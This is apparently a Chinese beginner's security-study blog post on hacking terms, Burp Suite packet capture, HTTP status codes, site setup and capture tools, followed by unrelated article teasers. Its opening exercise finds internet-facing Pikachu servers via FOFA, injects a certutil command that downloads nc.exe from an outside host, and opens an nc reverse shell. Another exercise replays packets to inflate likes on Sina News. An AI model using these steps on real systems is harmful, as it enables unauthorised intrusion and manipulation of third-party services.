安全基础从0开始

文章目录

  • 常见名词
    • 小实战
  • 网站搭建
    • 小实战
    • 抓包模拟器
    • 状态码返回值
    • 网站搭建
    • WEB应用安全漏洞
  • 数据包&封包&信息收集
    • **参考点**

常见名词

前后端,POC/EXP,Payload/Shellcode,后门/Webshell,木马/病毒,

反弹,回显,跳板,黑白盒测试,暴力破解,社会工程学,撞库,ATT&CK等

名词解释

小实战

  • fofa暗网浏览器中,使用"pikachu" && country="CN" && title="Get the pikachu"命令,查询在线pikachu服务器,进入测试命令执行漏洞

    eg

  • 执行命令,查看回显

    eg

  • 查看本机是哪种服务器,接着使用下载命令,将远程连接nc下载到本地,并命名为n.exe
    文档下载命令转换

    eg

  • 选择CMD下载命令,复制命令,使用命令执行127.0.0.1 & certutil.exe -urlcache -split -f http://www.xxx.com:80/nc.exe n.exe,出现以下,表示下载完成,也可以使用dir查看
    eg
    COMPLETE

  • 接着在想要反弹shell的电脑上使用命令 nc -lvvp 端口号(5566)监听端口;在肉机上用nc -e /bin/sh(或cmd) 目标ip 5566;成功连接上远端服务器。
    success

网站搭建

Web应用&架构搭建&漏洞概念&HTTP

Web应用&架构
理解不同WEB应用组成角色功能架构:
开发语言,程序源码,中间件容器,数据库类型,服务器操作系统,第三方软件等
开发语言:asp,php,aspx,jsp,java,python,ruby,go,html,javascript等
程序源码:根据开发语言分类;应用类型分类;开源CMS分类;开发框架分类等
中间件容器:IIS,Apache,Nginx,Tomcat,Weblogic,Jboos,glasshfish等
数据库类型:Access,Mysql,Mssql,Oracle,db2,Sybase,Redis,MongoDB等
服务器操作系统:Windows系列,Linux系列,Mac系列等
第三方软件:phpmyadmin,vs-ftpd,VNC,ELK,Openssh等

小实战

一个好玩的东西,新浪新闻点赞,在不登陆的情况下只能点赞一次,究其原因应该是浏览器前端问题,可以刷新页面继续点赞,也可以截取数据包,多次发送就能解决仅能发送一次的问题。

  • 已经点赞后,无论如何去点都无法再次增加点赞量,此时的点赞量为229。

eg

  • 开启burpsuite抓包,并右键送至中继器(repeater)
    eg

  • 关闭抓包,在repeater中继续send数据包,刷新网页查看点赞量,此时的点赞量已经到了250次了。
    end

抓包模拟器

在PC端显现出来的浏览器与手机端浏览器显现出来的不同,使用burpsuite抓包,观看数据包的区别。

  • burpsuite中配置代理,其中127是本地浏览器抓包,10是对该计算机局域网内进行抓包(特指模拟器)
    代理配置
  • 模拟器更改配置,代理--手动代理服务器主机名改为本机IP地址,dialing端口与上述一致,为8888,如下:
    模拟器配置
  • 分别在PC端与模拟器上抓包,让数据流经burp抓包工具,如下:
    数据包

通过User-Agent可知其发生差异的原因

状态码返回值

参考文章1
参考文章2
400:发送请求有语法错误
403:文件夹存在,没有权限访问
404:访问资源不存在(文件/文件夹)
3xx:跳转,处置过程,判断可有可无
    重定向(302)
5xx:内部错误,服务器问题,判断可有可无
    500.服务器内部异常
    504.服务器请求超时,没有返回结果

在对目标进行扫描时,尽量勾选它们,为了不放过任何结果,需要进行扫描
购买快代理,可以随时更换ip,防止ip被封禁,也可以实现VPN的功效。

网站搭建

安装的前提条件:

  • 拥有一台自己的服务器和属于自己的域名(域名要进行备案,如果不备案只能在大陆之外进行访问)
  • 服务器安装宝塔集成环境,方便操作使用
  • 选用远程连接工具,可以使用Windows自带的远程连接,也可以使用FinalShell进行连接,在远程服务器上进行操作

选择安装
选用Windows搭建:

  • 使用远端mstsc进行搭建,域名没有在国内备案,在阿里云选用大陆之外的云服务器
    选用按量收费,双核4G,服务器选用Windows版本
    eg
  • 确认下单之后,配置安全组,配置服务器密码,这些后期都能进行配置
    eg
  • 在服务器上下载宝塔,需要注册,在域名处提前配置好,将域名访问映射到服务器的ip,宝塔账号密码是随机的
    eg
  • 直接关掉该页面,会出现控制面板工具,复制面板地址到本机浏览器,开始网站的部署。
    面板
  • 进入以下界面,可以选择傻瓜式安装,也可以自己进行配置安装,在软件商店中选择。
    界面
    Win参考连接
    Linux参考连接

WEB应用安全漏洞

Web应用安全漏洞分类
SQL注入,文件安全,RCE执行,XSS跨站,CSRF/SSRF/CRLF,
反序列化,逻辑越权,未授权访问,XXE/XML,弱口令安全等

安全漏洞解释

数据包&封包&信息收集

参考连接

抓包的意义:     在我们安全测试中,对方可能会提供相对应的ip 地址,域名等等,那么有的应用是不会给你的,当在你测试的时候是不知道对方的目标名字什么的,那么我们就可以通过抓取数据包来获得你想要的信息,例如,对方主机/ip,或者与其相关的信息。

抓包的对象: 那么抓包他主要是针对协议去抓取的,根据不同的协议配对不同的抓包工具,就好比我们的网站他可以用BURP抓包工具,那么我们的APP或者小程序,它就不行了我们的BURP就抓取不到,为什么,因为我们的APP/小程序他走的不是HTTP协议的,所有抓取不到。

抓包的协议:     抓包的协议呢,就是我们的APP,它也可以是HTTP协议的走向,因为我们的HTML5就能做出APP,那么我们HTML5他的走向协议就是http协议,那个APP点开其实就是打开网站了,你留心可以发现,网站有一些网站和我们点开APP十分像

抓包的支持:     其实就是目标他支持哪些抓包工具,支持哪些协议

封包的意义:     封包他就能自定义我们的一个数据包,封包技术说简单也不简单,就是将一系列操作封装为数据包,方便使用,很多我们的外挂都用到封包技术,就相当于说你自定义一个数据包封装发送给服务器

参考点

Fiddler:
    是一个http协议调试代理工具,它能够记录并检查所有你的电脑和互联网之间的http通讯,设置断点,查看所有的“进出”Fiddler的数据(指cookie,html,js,css等文件)。 Fiddler 要比其他的网络调试器要更加简单,因为它不仅仅暴露http通讯还提供了一个用户友好的格式。

手机证书安装,需要将防火墙关闭,安装证书步骤参考
eg

Charles:
    是一个HTTP代理服务器,HTTP监视器,反转代理服务器,当浏览器连接Charles的代理访问互联网时,Charles可以监控浏览器发送和接收的所有数据。它允许一个开发者查看所有连接互联网的HTTP通信,这些包括request, response和HTTP headers (包含cookies与caching信息)。

    在模拟器中添加证书,help -->SSLproxying --> save Charles root certificate,保存之后,在模拟器中保存到文件夹中,接着设置-安全-(加密与凭据)用户凭据-从存储设备安装 / 设置-WALN-更多WALN设置-安装证书,接着会让输入密码,安装就能抓包。

抓取的包全部出现unknow的解决方法
proxy --> SSL Proxying Settings --> Add
来添加主机和端口,
如果个别情况出现unknow,可能是本身抓包软件存在个别漏抓问题。可以忽略
egeg
工具栏
从左到右分别为:

(1)清除当前会话
(2)开始记录
(3)开启SSL代理
(4)开始限流/停止限流
(5)开始断点/停止断点
(6)根据所写内容撰写新请求
(7)重发选定请求
(8)工具
(9)设置

Charles 激活码在线计算器
ios配置代理
ios下载证书问题
burp+逍遥模拟器 app抓包

TCPDump:
    是可以将网络中传送的数据包完全截获下来提供分析。它支持针对网络层、协议、主机、网络或端口的过滤,并提供and、or、not等逻辑语句来帮助你去掉无用的信息。

BurpSuite:
    是用于攻击web 应用程序的集成平台,包含了许多工具。Burp Suite为这些工具设计了许多接口,以加快攻击应用程序的过程。所有工具都共享一个请求,并能处理对应的HTTP 消息、持久性、认证、代理、日志、警报。

Wireshark:
    是一个网络封包分析软件。网络封包分析软件的功能是截取网络封包,并尽可能显示出最为详细的网络封包资料。Wireshark使用WinPCAP作为接口,直接与网卡进行数据报文交换。

WireShark使用教程

科来网络分析系统:
    是一款由科来软件全自主研发,并拥有全部知识产品的网络分析产品。该系统具有行业领先的专家分析技术,通过捕获并分析网络中传输的底层数据包,对网络故障、网络安全以及网络性能进行全面分析,从而快速排查网络中出现或潜在的故障、安全及性能问题。

WPE&封包分析:
    是强大的网络封包编辑器,wpe可以截取网络上的信息,修改封包数据,是外挂制作的常用工具。一般在安全测试中可用来调试数据通讯地址。

封包拦截器
封包监听工具

Charles (茶杯)
https://blog.csdn.net/weixin_45459427/article/details/108393878

Fidder
https://blog.csdn.net/weixin_45043349/article/details/120088449

BurpSuite
https://blog.csdn.net/qq_36658099/article/details/81487491

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/212614.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

ReactNative0.73发布,架构升级与更好的调试体验

这次更新包含了多种提升开发体验的改进,包括: 更流畅的调试体验: 通过 Hermes 引擎调试支持、控制台日志历史记录和实验性调试器,让调试过程更加高效顺畅。稳定的符号链接支持: 简化您的开发工作流程,轻松将文件或目录链接到其他…

react表单-受控

react - 表单组件 受控组件 表单项中的值(value/checked)受到类组件state中数据来控制,同时还需要绑定一个onChange事件来完成对state中数据的修改 import React, { Component } from react;class AppInput extends Component {// 设置受控组…

基于ssm应急资源管理系统论文

摘 要 现代经济快节奏发展以及不断完善升级的信息化技术,让传统数据信息的管理升级为软件存储,归纳,集中处理数据信息的管理方式。本应急资源管理系统就是在这样的大环境下诞生,其可以帮助管理者在短时间内处理完毕庞大的数据信息…

排序算法之七:归并排序(递归)

基本思想 基本思想: 归并排序(MERGE-SORT)是建立在归并操作上的一种有效的排序算法,该算法是采用分治法(Divide and Conquer)的一个非常典型的应用。将已有序的子序列合并,得到完全有序的序列&#xff1…

C++:this指针

目录 前言 成员函数返回this指向的对象本身时,为什是返回引用类型? 成员函数返回this对象本身时,内部通常会通过拷贝构造函数来创建一个临时对象? 总结 前言 c通过提供特殊的对象指针,this指针 指向被调用的成员函…

openssl 常用命令 pkcs12

openssl pkcs12 openssl pkcs12 官方文档 1. 描述 The pkcs12 command allows PKCS#12 files (sometimes referred to as PFX files) to be created and parsed. PKCS#12 files are used by several programs including Netscape, MSIE and MS Outlook. pkcs12 命令是用来创…

Nodejs 第二十二章(脚手架)

编写自己的脚手架 那什么是脚手架? 例如:vue-cli Angular CLI Create React App 编写自己的脚手架是指创建一个定制化的工具,用于快速生成项目的基础结构和代码文件,以及提供一些常用的命令和功能。通过编写自己的脚手架,你可以…

Linux和Windows环境下如何使用gitee?

1. Linux 1.1 创建远程仓库 1.2 安装git sudo yum install -y git 1.3 克隆远程仓库到本地 git clone 地址 1.4 将文件添加到git的暂存区(git三板斧之add) git add 文件名 # 将指定文件添加到git的暂存区 git add . # 添加新文件和修改过的…

深入理解HTTP状态码及其在Web开发中的应用

在Web开发中,我们经常需要与服务器进行交互,以获取或发送数据。为了实现这一目标,我们使用HTTP协议。HTTP协议是一种无状态的、应用层的协议,它定义了客户端和服务器之间的通信方式。在HTTP协议中,有五种常用的HTTP状态…

Python高级算法——动态规划

Python中的动态规划:高级算法解析 动态规划是一种解决多阶段决策问题的数学方法,常用于优化问题。它通过将问题分解为子问题,并在解决这些子问题的基础上构建全局最优解。在本文中,我们将深入讲解Python中的动态规划,…

vs2017+qt5.14.2遇到的问题

1、在安装qt插件后,导入pro文件时,报 msvc-version.conf loaded but QMAKE_MSC_VER isn’t set 修改E:\Qt\Qt5.14.2\5.14.2\msvc2017_64\mkspecs\common\msvc-version.conf文件中添加

RabbitMQ学习笔记10 综合实战 实现新商家规定时间内上架商品检查

配置文件: 记住添加这个。 加上这段代码,可以自动创建队列和交换机以及绑定关系。 我们看到了我们创建的死信交换机和普通队列。 我们可以看到我们队列下面绑定的交换机。 我们创建一个controller包进行测试: 启动: 过一段时间会变成死信队列…

elasticsearch|大数据|elasticsearch的api部分实战操作以及用户和密码的管理

一, 前言 本文主要内容是通过elasticsearch的api来进行一些集群的管理和信息查询工作,以及elasticsearch用户的增删改查和密码的重设以及重置如何操作 接上文:elasticsearch|大数据|elasticsearch低版本集群的部署安装和安全增强---密码设…

SSM与SpringBoot面试题总结

什么是spring?谈谈你对IOC和AOP的理解。 Spring:是一个企业级java应用框架,他的作用主要是简化软件的开发以及配置过程,简化项目部署环境。 Spring的优点: 1、Spring低侵入设计,对业务代码的污染非常低。 2、Spring的DI机制将…

FPGA设计时序约束十一、others类约束之Set_Maximum_Time_Borrow

目录 一、序言 二、Set Maximum Time Borrow 2.1 基本概念 2.2 设置界面 2.3 命令语法 2.4 命令示例 三、参考资料 一、序言 在Vivado的时序约束窗口中,存在一类特殊的约束,划分在others目录下,可用于设置忽略或修改默认的时序路径分析…

IntelliJ IDEA开启git版本控制的简单教程

这篇文章想要分享一下怎么在IntelliJ IDEA开启版本控制,博主使用的是gitee,首先需要安装git,关于git的安装这里就不介绍了,很简单。 目录 创建git仓库 创建项目 开启版本控制 拉取项目 创建git仓库 首先,需要登录…

《Linux中lsof的神奇探秘:打开文件的魔法与更多相似利器》

前言 在Linux的世界里,lsof(List Open Files)是一个强大的工具,它能帮助我们轻松查看系统上打开的文件及网络连接。然而,除了lsof之外,还有一些与它功能相似且同样强大的命令等待着我们去发现。本文将引领…

MATLAB | 官方举办的动图绘制大赛 | 第四周(收官周)赛情回顾

MATHWORKS官方举办的迷你黑客大赛第三期(MATLAB Flipbook Mini Hack)圆满结束,虽然我的水平和很多大佬还有比较大的差距,但所有奖也算是拿满了: 专家评选前三名,以及投票榜前十:~ 每周的阶段性获奖者: 下面…

【Python】手把手教你用tkinter设计图书管理登录UI界面(三)

上一篇:【Python】手把手教你用tkinter设计图书管理登录UI界面(二)-CSDN博客 下一篇: 紧接上一篇文章,继续完善项目功能:用户登录。由于老王的注册部分有亿点点复杂,还没完成,但是…

ngixn 准备

确认yum可用,确认防火墙,确认SELinux 一项安装 yum -y install gcc make automake pcre-devel zlib zlib-devel openssl openssl-devel参数: gcc:编译依赖gcc环境 pcre:PCRE(Perl Compatible Regular Expressions)是一…